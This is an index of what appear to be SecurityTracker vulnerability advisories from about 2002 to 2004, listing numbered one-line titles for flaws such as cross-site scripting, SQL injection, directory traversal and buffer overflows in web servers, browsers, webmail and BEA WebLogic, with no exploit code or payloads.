[1010528] Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar
[1010511] webAuction Lets Remote Users Delete Auction Items
[1010506] Webmin Account Lockout Can Be Bypassed By Remote Users
[1010497] Web Wiz Forums 'registration_rules.asp' Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks
[1010496] Thy Web Server Can Be Crashed By Remote Users
[1010493] BEA WebLogic Server May Return an Unexpected User Identity to Certain RMI Requests
[1010492] BEA WebLogic Running SSL Can Be Crashed By Remote Users
[1010422] Webmin Discloses Module Configuration Data to Remote Authenticated Users
[1010377] IBM WebSphere Everyplace Server Cookie Authentication Weakness May Let Remote Users Hijack Sessions
[1010346] TinyWeb Lets Remote Users Download CGI Scripts
[1010323] WildTangent Web Driver Buffer Overflows in WTHoster and WebDriver Let Remote Users Execute Arbitrary Code
[1010169] WebCT Input Validation Holes in Discussion Board Permit Cross-Site Scripting Attacks
[1010154] Opera Web Browser URL Redirect Error Lets Remote Users Spoof the Status Bar Address
[1010129] BEA WebLogic May Let Remote Authenticated Admin/Operator Users Start or Stop Server
[1010128] BEA WebLogic 'security-role-assignment' Coding Error May Delete Access Controls Tag
[1010090] MyWeb Buffer Overflow Lets Remote Users Crash the Server With Long URLs
[1010037] Aldo's Web Server Discloses Arbitrary Files to Remote Users
[1010012] Web Wiz Forums Input Validation Hole in 'pop_up_ip_blocking.asp' Lets Remote Users Inject SQL Commands
[1010009] Microsoft Internet Explorer SSL Icon Error May Let Remote Users Impersonate Secure Web Sites
[1009960] HP Web Jetadmin ExecuteFile Function Lets Remote Users Execute Programs With Root/SYSTEM Privileges
[1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
[1009902] PostNuke Downloads, Web_Links, 'openwindow.php' Input Validation Holes Let Remote Users Conduct Cross-Site Scripting Attacks
[1009898] BEA WebLogic 'config.sh' and 'config.cmd' May Disclose Administrative Password to Local Users
[1009897] BEA WebLogic Bug Lets Applications Remove EJB Objects Without Permission
[1009896] BEA WebLogic May Stop Protecting URLs When Configured With Certain Illegal Protection Patterns
[1009795] cadaver Format String Flaws Let Remote WebDAV Servers Execute Arbitrary Code on Connected Clients
[1009794] neon Format String Flaws Let Remote WebDAV Servers Execute Arbitrary Code on Connected Clients
[1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges
[1009766] BEA WebLogic May Disclose Administrative Password in Certain Cases
[1009765] BEA WebLogic Custom Trust Manager Flaw May Let Remote Users Impersonate Target Users or Servers
[1009764] BEA WebLogic May Disclose Database Password Via 'config.xml' For Untargeted JDBC Connection Pools
[1009763] BEA WebLogic Authentication Provider May Assign Incorrect Privileges in Certain Cases
[1009724] Open WebMail Input Validation Flaw Lets Remote Users Create Arbitrary Directories
[1009676] F-Secure BackWeb (for AntiVirus) Lets Local Users Gain SYSTEM Privileges
[1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service
[1009662] Monit Errors in Basic Authentication on the Administration Interface Let Remote Users Execute Arbitrary Code
[1009652] Aborior Encore Web Forum Input Validation Flaw in 'display.cgi' Lets Remote Users Execute Arbitrary Commands
[1009642] MondoSearch 'MsmHigh.exe' Can Be Used As a Web Proxy By Remote Users
[1009591] WebCT Input Validation Flaw Permits Remote Cross-Site Scripting Attacks Using @import url()
[1009555] HP Web Jetadmin Lets Remote Authenticated Users Read and Write Files on the System
[1009514] XWeb '../' Input Validation Flaw Discloses Files to Remote Users
[1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
[1009451] Fizmez Web Server Can Be Crashed By Remote Users
[1009446] IBM Lotus Domino 'webadmin.nsf' Flaws Let Remote Authenticated Administrators Create Arbitrary Directories
[1009443] Twilight Utilities Web Server 'postfile.exe' Lets Remote Users Upload Files to Arbitrary Locations
[1009419] Oracle Application Server Web Cache Has Unspecified High Risk Flaw
[1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
[1009406] Open WebMail 'userstat.pl' Input Validation Hole Lets Remote Users Execute Arbitrary Commands
[1009403] CFWebstore Input Validation Bugs Let Remote Users Inject SQL Commands and Conduct Cross-Site Scripting Attacks
[1009397] EMU Webmail 'emumail.fcgi' Input Validation Flaw Permits Cross-Site Scripting Attacks
[1009396] Pegasi Web Server Discloses Files Outside of the Web Document Directory to Remote Users
[1009340] PWebServer '../' Input Validation Flaw Lets Remote Users Traverse the Directory
[1009334] SURECOM Router Configuration Interface Can Be Crashed By Remote Users
[1009331] SL Mail Pro SLWebMail Buffer Overflows Let Remote Users Execute Arbitrary Code
[1009305] GWeb '../' Input Validation Flaw Discloses Files to Remote Users
[1009302] [Vendor Disputes Claim] Web Wiz Forums 'Forgotten Password' Flaw Fails to Change Valid Authentication Cookie
[1009115] Webstores 2000 Has More Input Validation Flaws in 'browser_item_details.asp' That Let Remote Users Inject SQL Commands and Execute OS Commands
[1009089] Vizer Web Server Can Be Crashed By Remote Users
[1009088] Sami HTTP Server Buffer Overflow Lets Remote Users Crash the Web Server
[1009045] phpWebSite 'ANN_id' Variable Input Validation Hole Lets Remote Users Inject SQL Commands
[1009023] Monkey Web Server Can Be Crashed By HTTP GET Requests With No Host Value
[1009013] MaxWebPortal Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
[1009006] PHP-Nuke Search and Web_links Modules Permit Remote SQL Injection
[1009003] Resin Web Server Discloses JSP Source Code to Remote Users
[1008927] Web Crossing Can Be Crashed By Remote Users Sending Malformed Content-Length Values
[1008907] Leif M. Wright Web Blog Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
[1008896] Forum Web Server 'Subject' and 'Field Description' Input Validation Flaw Permits Cross-Site Scripting Attacks
[1008880] BRS WebWeaver Input Validation Flaw in ISAPISkeleton.dll Permits Cross-Site Scripting Attacks
[1008872] Leif M. Wright Web Blog Input Validation Flaw Discloses Files to Remote Users
[1008869] BEA WebLogic May Disclose Managed Server Password to Local Users
[1008868] BEA WebLogic May Write Administrator Password in Clear Text to 'config.xml'
[1008867] BEA WebLogic May Disclose MBean Passwords to Operators in Certain Cases
[1008866] WebLogic Server and Express Input Validation Flaw in Processing HTTP TRACE Requests Permits Cross-Site Scripting
[1008848] Mbedthis AppWeb Can Be Crashed By Remote Users
[1008842] Reptile Web Server HTTP Request Flaw Lets Remote Users Deny Service
[1008840] Borland Web Server Input Validation Flaw Discloses Files to Remote Users
[1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
[1008799] WebTrends Reporting Center Discloses Installation Path to Remote Users
[1008778] AIPTEK NetCam Web Server Software Discloses Files to Remote Users
[1008768] GetWare PhotoHost Web Server Can Be Crashed By Remote Users
[1008767] GetWare WebCam Live Web Server Can Be Crashed By Remote Users
[1008766] GoAhead Web Server Consumes Excessive Resources When Receiving an Incomplete POST Request
[1008760] GoAhead Web Server Input Validation Flaw Discloses Files in Restricted Directories to Remote Users
[1008711] Symantec Web Security Blocked Page Message Lets Remote Users Conduct Cross-Site Scripting Attacks
[1008701] Helix Universal Server Administration Interface May Grant Root Access to Remote Authenticated Users
[1008682] BEA WebLogic Server and Express Ant Tasks May Disclose the Administrator Password
[1008671] Sun ONE Web Server Buffer Overflow on HP-UX Lets Remote Users Crash the Web Service
[1008669] DansGuardian Webmin Module 'edit.cgi' Lets Remote Authenticated Users Edit Arbitrary Files
[1008587] Webcam Watchdog Stack Overflow Lets Remote Users Execute Arbitrary Code
[1008551] L-Soft LISTSERV Input Validation Flaw in WA.EXE Management Interface May Permit Cross-Site Scripting Attacks Against List Administrators
[1008540] DCAM WebCam Server Input Validation Flaw Discloses Files to Remote Users
[1008539] XOOPS Input Filtering Flaw in Weblinks 'myheader.php' Permits Cross-Site Scripting Attacks
[1008525] Active WebCam Input Validation Flaws Disclose Files on the System and Permit Cross-Site Scripting
[1008460] Opera Web Browser Download Dialog Lets Remote Users Delete Arbitrary Files
[1008428] Microsoft ASP.NET Web Services XML Parsing Lets Remote Users Consume CPU Resources With SOAP Requests
[1008427] IBM WebSphere XML Parsing Lets Remote Users Consume CPU Resources With SOAP Requests
[1008424] BNCweb Input Validation Flaw Discloses Files to Remote Users
[1008417] Web Eye Video Servers Disclose Usernames and Passwords
[1008414] Abyss Web Server Directory Password Protection Can Be Bypassed
[1008410] Apple Safari Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain
[1008374] Websense Input Validation Flaw in Blocked Site Error Message Permits Cross-Site Scripting Attacks
[1008364] Sun ONE Web Server Can Be Crashed By Remote Users Due to Unspecified Flaw
[1008339] CuteNews Discloses Web Server Information to Remote Users
[1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
[1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users
[1008300] Macromedia JRun Input Validation Flaws in Administrative Interface Permit Cross-Site Scripting Attacks
[1008265] Xitami Web Server Bug in Processing Certain HTTP POST Headers Lets Remote Users Deny Service
[1008227] SqWebMail URL-based Session IDs Let Remote Users Hijack E-mail Sessions
[1008217] SAP DB web-tools Have Multiple Flaws That Disclose Files, Permit Remote Code Execution, and Grant Access to Remote Users
[1008215] phpWebFileManager Input Validation Flaw in 'f' Variable Discloses Files to Remote Users
[1008208] iPlanet Web Server Log Analyzer Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against Administrators
[1008181] Web Wiz Forums Registration Scripts Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks
[1008180] WebWasher Classic Proxy Input Validation Flaw Permits Remote Cross-Site Scripting Attacks
[1008178] Symantec pcAnywhere Help Interface Yields SYSTEM Privileges to Users
[1008162] BEA WebLogic Configuration Error May Disclose MBean Data to Remote Users
[1008161] BEA WebLogic Node Manager Can Be Crashed By Remote Users
[1008160] BEA WebLogic T3S Protocol May Not Encrypt Connections in Certain Cases
[1008159] BEA WebLogic May Disclose JMS Provider Passwords to Local or Remote Authenticated Users
[1008158] FortiGate Firewall Admin Interface Input Validation Flaw Permits Remote Cross-Site Scripting Attacks Against Administrators
[1008156] BEA WebLogic Input Validation Flaw in Proxy Plug-in Lets Remote Users Crash the Service With Malformed URLs
[1008136] tc.SimpleWebServer '.../' Directory Traversal Flaw Discloses Files to Remote Users
[1008075] IA WebMail Server Buffer Overflow in Processing HTTP Headers Lets Remote Users Execute Arbitrary Code
[1008074] Web Wiz Forums Discloses Private Messages to Remote Users
[1008072] Plug and Play Web Server Proxy Service Can Be Crashed By Remote Users
[1008071] BRS WebWeaver Can Be Crashed By Remote Users Sending Long 'User-Agent' Contents
[1008048] iWeb Server '%5C' Input Validation Flaw Discloses Files on the System to Remote Users
[1008041] BEA WebLogic Enterprise Input Validation Flaws Let Remote Users Determine File Existence, Deny Service, and Conduct Cross-Site Scripting Attacks
[1008036] tc.SimpleWebServer Buffer Overflow in Processing the HTTP Referer Lets Remote Users Execute Arbitrary Code
[1008016] InfronTech WebTide Server Discloses Files and Directories to Remote Users
[1007977] Web Wiz Forums Input Validation Holes Permit Cross-Site Scripting Attacks
[1007965] Origo ASR-8100 ADSL Router Offers a Remote Configuration Interface With No Authentication
[1007958] Resin Web Server Example Scripts Permit Remote Cross-Site Scripting Attacks
[1007936] Microsoft Outlook Web Access Input Validation Flaw in 'Compose New Message' Permits Remote Cross-Site Scripting Attacks
[1007930] Linksys BEFSX41 Can Be Crashed With a Long Log_Page_Num Admin Interface Parameter
[1007865] MPWeb PRO Directory Traversal Flaw Discloses Files to Remote Users
[1007835] webfs 'ls.c' Long Pathname Buffer Overflow Permits Code Execution and 'vhosts' Input Validation Flaw Discloses Files to Remote Users
[1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
[1007805] WebTool-userpass May Disclose SSH User Passphrases to Certain Local Users
[1007801] BRS WebWeaver May Fail to Properly Log Certain Requests With Long Host Field Contents
[1007774] Xitami Web Server Can Be Crashed By Remote Users Sending Large HTTP GET Request Headers
[1007740] Plug and Play Web Server Lets Remote Authenticated Users Crash the FTP Service Sending Long FTP Commands
[1007723] Yahoo! Webcam Viewer ActiveX Buffer Overflow Permits Remote Code Execution
[1007711] Easy File Sharing Web Server Discloses Files and Passwords to Remote Users
[1007707] Minihttp Forum Web Server Password Parsing Flaw Grants Admin Privileges to Remote Users
[1007686] 4D WebSTAR Password Command Buffer Overflow in FTP Service Lets Remote Users Execute Arbitrary Code
[1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
[1007663] WebX Server Discloses Files on the System to Remote Users
[1007657] ICQ Web Front Input Validation Flaw in Guest Book Code Permits Remote Cross-Site Scripting Attacks
[1007651] RealSecure Server Sensor Unicode Flaw Lets Remote Users Crash the IIS Web Service
[1007642] FoxWeb Buffer Overflow in 'foxweb.dll' Lets Remote Users Execute Arbitrary Code
[1007625] WebCalendar Input Validation Flaws in Multiple Variables Permit Cross-Site Scripting Attacks and Possibly SQL Injection Attacks
[1007606] EZ-Web Site Builder Discloses Files on the System to Remote Authenticated Users
[1007589] BEA WebLogic Integration Business Connect May Disclose Files to Remote Users
[1007580] MPCSoftWeb Discloses Chat User Passwords to Remote Users
[1007570] MPCSoftWeb Thread Tree Discloses Administrative Password to Remote Users
[1007568] MPCSoftWeb Forum Access Control Flaw Discloses Administrator and User Passwords to Remote Users
[1007567] MPCSoftWeb Photo Discloses Administrator Password to Remote Users
[1007566] AnalogX Proxy Input Validation Flaw Permits Remote Cross-Site Scripting Attacks Against Arbitrary Web Sites
[1007562] GNU Whois Local Buffer Overflow May Present a Remote-Based Vulnerability When Called By Web Applications
[1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
[1007541] Lotus Domino Web Server Can Be Crashed With Incomplete or Invalid POST Request
[1007533] oMail-webmail Input Validation Flaw in checklogin() Lets Remote Users Execute Arbitrary Shell Commands
[1007518] DWebPro Discloses MySQL Database Password to Local Users
[1007512] WebFtp Discloses Passwords to Local Users
[1007501] WebiToome Discloses Passwords to Local Users
[1007490] Webware WebKit Input Validation Flaw in SmartCookie May Let Remote Users Execute Arbitrary Code
[1007489] SkunkWeb Input Validation Flaw Discloses Files Located Outside of the Document Directory to Remote Users
[1007470] Lil' HTTP Server Discloses Web Server Passwords to Local Users
[1007469] imate Web Mail Server Discloses E-mail Passwords to Local Users
[1007463] EFTP Discloses FTP Server Passwords and the Web Administration Password to Local Users
[1007457] phpWebSite Calendar Module Permits SQL Injection, Cross-Site Scripting Attacks, and Denial of Service Attacks
[1007452] Xitami Web Server Fails to Log Non-HTTP Connections
[1007439] PostNuke 'ttitle' Variable in 'Web_Links' Modules Permits Remote Cross-Site Scripting Attacks
[1007426] BEA WebLogic Server Console Input Validation Holes Permit Cross-Site Scripting Attacks Against Administrators
[1007388] Microsoft WebServer Beta for Pocket PC Yields Administrative Access to Remote Users
[1007383] Minihttp Forum Web Server Default Configuration Leaves Administrator Account Without a Password
[1007367] Novell GroupWise WebAccess Discloses Wireless User Passwords to Local Users
[1007341] BEA WebLogic Code Flaw May Let Remote Users Gain Access to Other User Accounts
[1007309] e107 Website System Input Validation Hole in Custom Format Tags Permits Remote Cross-Site Scripting Attacks
[1007296] e107 Website System Discloses Usernames and Hashed Passwords to Remote Users
[1007269] NetWare Enterprise Web Server PERL Handler Buffer Overflow Lets Remote Users Crash the Web Service
[1007238] Microsoft Outlook Web Access Can Be Crashed By Remote Authenticated Users With an Outlook 2003 Client
[1007233] WebCalendar $user_inc Global Variable Lets Remote Users View Files on the System
[1007232] Savant Web Server Can Be Crashed By Remote Users Making Many Connections
[1007221] Cisco IOS Router Interfaces Can Be Blocked by Remote Users Sending Certain IPv4 Packets
[1007215] OmniHTTPd Web Server Has Input Validation Holes in Additional Sample Scripts That Let Remote Users Conduct Cross-Site Scripting Attacks
[1007190] Microsoft Internet Explorer 'Chromeless' Window May Let Remote Users Spoof Various User Interface Characteristics
[1007189] WebShield SMTP for Windows NT Lets Remote Users Send Executables Through the Filter
[1007182] Grub Web Crawler Discloses Password to Local Users
[1007157] TinyWEB URL Processing Flaw Lets Remote Users Create Denial of Service Conditions
[1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
[1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
[1007135] BEA WebLogic Server May Disclose the Node Manager Password to Local Users
[1007134] BEA WebLogic Managed Server Independence Access Control Flaw May Yield Console Access to Remote Users
[1007133] Microsoft Outlook Web Access (OWA) May Disclose The User's OWA Password to Remote Users
[1007131] BEA WebLogic Server and Express May Disclose 'Admin' Password to 'Operator' Users
[1007112] myServer CGI Script Input Validation Flaws Let Remote Users Crash the Web Server
[1007103] Greymatter Weblog Input Validation Flaw Lets Remote Users Execute PHP Commands on the Target Server
[1007091] VisNetic WebSite Discloses Installation Path to Remote Users
[1007087] Abyss Web Server Heap Overflow Lets Remote Users Execute Arbitrary Code
[1007080] PinkNet Web Server Discloses Files on the System to Remote Users
[1007075] WebBBS Guest Book Input Validation Flaw Permits Remote Cross-Site Scripting Attacks
[1007067] BRS WebWeaver Input Validation Hole in Generating Error Messages Lets Remote Users Conduct Cross-Site Scripting Attacks
[1007049] Alt-N WebAdmin Buffer Overflow in 'USER' Parameter Lets Remote Users Execute Arbitrary Code With System Privileges
[1007044] iWeb Server Lets Remote Users View Files on the System
[1007028] QNX Demodisk Web Server Discloses Files to Remote Users
[1007009] ARMIDA Web Server Lets Remote Users Introduce Denial of Service Conditions
[1007004] JEUS Web Server Input Validation Flaw Permits Remote Cross-Site Scripting Attacks
[1006999] myServer Web Server Input Validation Flaw Discloses Files on the System to Remote Users
[1006992] myServer Web Server HTTP Parsing Flaw Lets Remote Users Crash the Web Service
[1006972] silentThought Simple Web Server Directory Traversal Flaw Discloses Files to Remote Users
[1006971] Nuca WebServer Plugin Discloses Files on the System to Remote Users
[1006968] WebBBS Pro Can Be Crashed By Remote Users
[1006953] Aiglon Web Server Discloses Installation Path to Remote Users
[1006944] MaxWebPortal Authentication Flaws Let Remote Users Access Any Account
[1006939] Synkron.web Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks
[1006936] myServer Web Service Can Be Crashed By Remote Users With Long URLs
[1006928] Monkey Web Server Test Files Disclose System Information and Permit Cross-Site Scripting Attacks
[1006919] MegaBrowser Web Server Discloses Files on the System to Remote Users
[1006913] Pi3Web Server Flaw in Sorting Directory Index Listings May Let Remote Users Crash the Web Service
[1006909] WebChat for PHP-Nuke Has Multiple Flaws That Allow Cross-Site Scripting and Possibly SQL Injection
[1006893] Webstores 2000 Input Validation Flaw Lets Remote Users Inject SQL Commands
[1006890] Forum Web Server Discloses Files to Remote Users and Passwords to Remote Users Sniffing the Network
[1006880] Softrex Tornado www-Server Bugs Disclose Specified Files to Remote Users and Allow Remote Users to Crash the Web Service
[1006877] Webfroot Shoutbox Input Validation Flaws Let Remote Users View Files and Execute Commands on the System
[1006874] Son hServer Web Server Input Validation Flaw Lets Remote Users View Arbitrary Files on the System
[1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
[1006852] BRS WebWeaver HTTP Buffer Overflows Let Remote Users Crash the Web Service
[1006812] 'WsMp3 web_server' Heap Overflow Lets Remote Users Execute Arbitrary Code
[1006811] WsMp3 web_server Lets Remote Users View Files and Execute Binaries on the Server
[1006793] PHP-Nuke Input Validation Flaws in Several Modules (Sections, AvantGo, Surveys, Downloads, Reviews, Web_Links) Let Remote Users Inject SQL Commands
[1006744] BEA WebLogic May Disclose Clear-Text Passwords to Local Users or Remote Authenticated Users
[1006720] SLwebmail3 Discloses Files on the System to Remote Users and May Let Remote Users Execute Arbitrary Code
[1006705] CommuniGate Pro Webmail May Disclose User Session IDs to Remote Users
[1006701] webcamXP Input Validation Flaws Permit Cross-Site Scripting Attacks
[1006696] Microsoft Internet Explorer Web Folder Access Flaw Lets Remote Users Execute Arbitrary Scripting Code in the My Computer Zone
[1006687] Web Server 4D Buffer Overflow in Processing Long URLs Allows Remote Users to Execute Arbitrary Code
[1006670] Opera Web Browser Can Be Crashed When Downloading a File With a Long Filename Extension
[1006665] Pi3Web Server Can Be Crashed By Remote Users Sending Malformed HTTP GET Requests
[1006652] BRS WebWeaver Can Be Crashed By Remote Authenticated Users Via the RETR Command
[1006637] Sambar Server WebMail Discloses User Passwords Transmitted Via the Network
[1006631] Xeneo PHP Web Server URL Encoding Input Validation Bug Lets Remote Users Crash the Web Service
[1006618] Xeneo Web Server Can Be Crashed By Remote Users
[1006616] AN HTTPD Web Server Sample Script ('count.pl') Lets Remote Users Create or Overwrite Files on the System
[1006613] 360 Degree Web PlatinumSecret Access Control Flaw Gives Physically Local Users Limited Access
[1006612] MPCSoftWeb GuestBook Discloses Administrator Password to Remote Users
[1006610] Monkey Web Server Buffer Overflow in Processing POST Requests Lets Remote Users Execute Arbitrary Code
[1006597] Web Wiz Forums Discloses Forum Database to Remote Users
[1006583] iWeb Server Input Validation Directory Traversal Flaw Discloses Files to Remote Users
[1006582] Twilight Utilities Web Server Can Be Crashed By Remote Users
[1006574] Web Wiz Site News Discloses Administrator Password to Remote Users
[1006556] MailMax/Web Discloses Installation Path to Remote Users
[1006547] CC Guestbook Input Validation Flaw in 'Name' and 'Webpage Title' Lets Remote Users Conduct Cross-Site Scripting Attacks
[1006536] phPay Web Shopping Input Validation Flaws Disclose Information to Remote Users and Permit Cross-Site Scripting Attacks
[1006489] Abyss Web Server HTTP Header Validation Flaw Lets Remote Users Crash the Web Server
[1006456] WebC Shopping Cart Has Multiple Flaws That Allow Remote Users to Execute Arbitrary Code and Local Users to Gain Elevated Privileges
[1006448] BEA WebLogic May Disclose Internal Hostname to Remote Users
[1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
[1006442] DeskNow Web Mail Uses Clear Text Authentication for Web Mail Access
[1006426] Kerio WinRoute Firewall Administration Interface Flaw Lets Remote Users Create Denial of Service Conditions
[1006410] Beanwebb Guestbook Lack of Authentication Gives Remote Users Administrative Access to the Guestbook
[1006382] PHP WEB CHAT Input Validation Flaws Let Remote Users Conduct Cross-Site Scripting Attacks
[1006310] BEA WebLogic Server and Express Access Control Bug Lets Remote Authenticated Users Delete Empty Sub-Contexts
[1006309] BEA WebLogic Memory Session Persistence Error May Let Remote Users Access Applications
[1006308] MyABraCaDaWeb Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks
[1006306] WebLogic Server and Express Authentication Flaw May Let Remote Users Access Administrative Functions
[1006305] Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1006265] Lotus Domino Server Web Retriever Buffer Overflow Lets Remote Systems Crash the Web Retriever
[1006257] Microsoft Internet Explorer Buffer Overflow in Processing '.MHT' Web Archives Lets Remote Users Execute Arbitrary Code
[1006242] WebLog Expert Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against WebLog Expert Users
[1006240] WebTrends Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against WebTrends Users
[1006231] Forum Web Server Discloses Files on the System, Including Clear Text Passwords, to Remote Users
[1006226] Dr.Web Virus Scanner Buffer Overflow Lets Local Users Gain Root Privileges
[1006193] WebChat Include File Bug in 'defines.php' Lets Remote Users Execute Arbitrary Commands
[1006189] WEB-ERP Discloses Configuration File to Remote Users, Yielding Full Access to the Database
[1006178] Opera Web Browser Redirection Input Validation Hole Allows Cross-Site Scripting Attacks
[1006171] GroupWise WebAccess Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks
[1006160] Webmin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Spoof Session IDs and Gain Root Access
[1006127] cPanel Web Hosting Control Panel Bugs Let Remote Users Execute Arbitrary Commands and Local Users Gain Root Privileges
[1006123] IBM Lotus Domino Web Server Redirect Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1006122] Lotus Domino Web Server iNotes Buffer Overflow in 'PresetFields' Lets Remote Users Execute Arbitrary Code
[1006114] 'Kietu?' Web Site Statistics Software Include File Error Lets Remote Users Execute Arbitrary Commands
[1006090] Lotus Domino Web Server May Disclose File Source Code to Remote Users When Requests Are Appended With a Period
[1006068] Cedric Email Reader (Webmail) Include File Bug Lets Remote Users Execute Arbitrary Code
[1006060] w3m Text Web Browser Input Validation Flaw Allows Cross-Site Scripting Attacks
[1006044] Opera Web Browser Multiple Flaws Disclose Private Information and Let Remote Users Access Local Files and Directories
[1006041] WebSphere Discloses Passwords in the XML Configuration Export File
[1006039] Compaq Insight Manager Web Agent Session Security Hole May Yield Access to Remote Users
[1006024] 3ware 3DM Disk Management Utility Web Daemon Bugs Let Remote Users Crash the Software
[1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
[1006019] EditTag Web Content Editing Script Discloses Files on the System to Remote Users
[1006018] BEA WebLogic May Disclose One User's Session Data to Another User
[1006017] BEA WebLogic Server and Express Access Control Error May Disclose Passwords to Local Users
[1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
[1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
[1005950] PeopleSoft PeopleTools Web Server Component Discloses Files to Remote Users
[1005922] WebCollection Plus Discloses Files on the System to Remote Users
[1005909] BRS WebWeaver FTP Server Flaw Lets Remote Authenticated Users Create Arbitrary Directories on the Server
[1005906] WebIntelligence Predictable Session Cookies Let Remote Users Hijack Sessions
[1005905] GeneWeb Input Validation Flaw Discloses Files on the System to Remote Users
[1005893] H-Sphere Web Hosting Software Buffer Overflow in 'WebShell' Lets Remote Users Grab Root Privileges
[1005892] Smart Search CGI Input Validation Flaw Lets Remote Users Execute Commands on the Web Server
[1005886] AN HTTPD Web Server Discloses Installation Path to Remote Users
[1005880] Brown Bear Software's iCal Web Calendar Server Can Be Crashed By Remote Users
[1005873] Ensim WEBpliance Server Management Software Lets Remote Authenticated Users Receive E-mail for Subsequently Created Users on the Hosted Domain
[1005866] Web-cyradm IMAP Administration Software May Let Remote Authenticated Users Crash the Server
[1005844] Captaris Infinite WebMail Server Input Validation Flaws Let Remote Users Conduct Cross-Site Scripting Attacks
[1005837] Open WebMail Input Validation Bug Lets Local Users and Certain Remote Users Execute Code With Root Privileges
[1005830] LocalWEB2000 Web Server Discloses Plaintext Passwords to Remote Users
[1005822] Linux 2.2 Kernel Bug in /proc/pid/mem mmap() Interface May Let Local Users Crash the System
[1005820] GoAhead WebServer Discloses Script Source Code to Remote Users
[1005808] Eserv Boundary Error Lets Remote Users Crash the Mail, News, Web, and FTP Services
[1005795] BEA WebLogic Bug In Parsing XML DTDs May Let Remote Users Crash the Server
[1005791] VisNetic WebSite Web Server Software Can Be Crashed By Remote Users
[1005785] myServer Web Server Input Validation Flaw Discloses Files on the System to Remote Users
[1005771] WebReflex Web Server Discloses Arbitrary Files on the System to Remote Users
[1005751] SMB2WWW Web-Based Windows Networking Client Bug Lets Remote Users Execute Arbitrary Programs
[1005730] Webster HTTP Server Multiple Bugs Let Remote Users Execute Arbitrary Code and View Files on the System
[1005726] pWins Web Server Input Validation Flaw Discloses Files on the System to Remote Users
[1005712] Web Server Creator Include File Error Enables Remote Users to Execute Arbitrary Commands
[1005706] WSMP3 Web_server Buffer Overflows and malloc()/free() Bug Allow Remote Users to Execute Arbitrary Code
[1005688] Open WebMail Discloses User and Group Account ID Information to Remote Users
[1005680] Zeroo Web Server Discloses Files on the System to Remote Users
[1005656] Sun iPlanet Web Server Cross-Site Scripting and Unsafe Perl Script open() Calls Let Remote Users Execute Commands on the Server
[1005655] Linksys Router Web Management Access Flaw Gives Remote Users Administrative Access to the Device
[1005648] Perception LiteServe Input Validation Flaw in Processing Encoded URLs Lets Remote Users Crash the Web Server
[1005639] Courier SqWebMail Privilege Dropping Bug Lets Local Users View Files on the System
[1005636] LiteServe Web Server Input Validation Flaw in Processing CGI Filenames May Disclose CGI Source Code to Remote Users
[1005630] XOOPS WebChat Module Input Validation Flaw Lets Remote Users Inject and Execute SQL Commands on the Underlying Database Server
[1005620] KeyFocus KF Web Server Discloses Files on the System to Remote Users
[1005614] INweb Mail Server Can Be Crashed By Remote Users
[1005585] Simple Web Server Lets Remote Users Bypass File Access Controls
[1005574] LiteServe Web Server Input Validation Errors Let Remote Users Conduct Cross-Site Scripting Attacks
[1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
[1005528] Xeneo PHP Web Server Input Validation Bug Lets Remote Users Crash the Web Service
[1005523] AstroCam Webcam Management Software Input Validation Flaw Lets Remote Users Execute Arbitrary Programs
[1005511] Prometheus Web Application Framework Include Path Bug Lets Remote Users Execute Arbitrary PHP Commands
[1005509] Linksys BEFSR41 EtherFast Cable/DSL Router Can Be Crashed By Remote Users Via the Web Management Port
[1005507] Monkey Web Server Can Be Crashed By Remote Users Sending Certain POST Requests
[1005504] Microsoft Internet Information Server (IIS) WebDAV Memory Allocation Flaw Lets Remote Users Crash the Server
[1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
[1005498] Sun Web-Based Enterprise Management (WBEM) Default Installation Error May Let Local Users Grab Root Privileges
[1005492] Forum Du Dobermann Web Forum Include File Error Lets Remote Users Execute Arbitrary Commands
[1005490] AN HTTPD Web Server Lets Remote Users Conduct Cross-Site Scripting Attacks
[1005480] BRS WebWeaver May Disclose Certain Password-Protected Files to Remote Users
[1005479] Perception's LiteServe Web Server May Disclose Password-Protected Files to Remote Users
[1005478] BadBlue Web Server May Disclose Password-Protected Files to Remote Users
